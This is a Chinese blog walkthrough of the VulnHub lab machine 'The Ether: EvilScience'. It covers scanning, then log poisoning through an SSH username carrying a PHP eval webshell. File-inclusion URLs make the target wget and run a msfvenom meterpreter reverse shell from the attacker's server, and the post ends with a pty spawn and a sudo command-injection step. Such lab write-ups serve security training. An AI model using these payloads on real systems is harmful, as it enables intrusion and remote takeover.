The Ether: EvilScience (v1.0.1)打靶渗透【附代码】(权限提升)

靶机下载地址:

https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '00:0C:29:7F:50:FB'

1.2. 端口扫描

nmap -p- 192.168.7.172

1.3. 目录扫描

 dirb http://192.168.7.172

1.4. 敏感信息获取

2. WEB打点寻找漏洞点

2.1. 老规矩,逐个点击功能点,查看可以利用的功能点

1.点击about us中url带有file协议,疑似存在文件包含漏洞,尝试利用文件包含的几个方式获权限

2.由敏感信息可知其服务器中间件是apache,文件包含可通过日志文件包含获权,尝试拼接默认目录 -> /var/log/auth.log路径无法访问?存在报错??? -> 尝试利用ssh登录报错注入进错误访问日志中

ssh "<?php eval($_GET[cmd]);?>"@192.168.7.172

3.尝试burp抓包,查看数据包信息

2.2. GetShell

1.拼接命令

2.打开kali,利用msf生成shell -> 同时打开msf的内部监听

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=4444 -f elf > shell.elf

msfconsole

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.7.36
set lport 4444

3.新启一个http临时服务,让靶机远程下载我们的shell.elf文件[起的服务一定要在shell文件同一目录开启]

python -m http.server 8001

4.在靶机网页逐个拼接下方链接

/?file=/var/log/auth.log&d1no=system('wget+192.168.7.36:8001/shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

监听器上线

3. 权限提升

3.1. 老规矩,msf上线先转shell,再利用python做持续化输出调配

shell
# 持续化
python -c 'import pty;pty.spawn("/bin/bash")'

3.2. 老规矩,查看用户执行命令权限

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙则Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值